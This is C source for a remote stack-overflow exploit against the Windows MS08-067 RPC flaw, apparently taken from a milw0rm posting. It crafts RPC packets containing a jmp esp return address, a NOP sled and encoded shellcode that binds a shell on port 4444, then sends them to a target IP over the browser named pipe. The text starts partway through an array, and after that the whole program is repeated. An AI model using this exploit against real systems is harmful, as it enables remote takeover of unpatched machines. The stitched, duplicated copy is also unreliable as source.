"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
// milw0rm.com [2008-11-12]
/*
MS08-067 Remote Stack Overflow Vulnerability Exploit
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28
*/
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
// milw0rm.com [2008-11-12]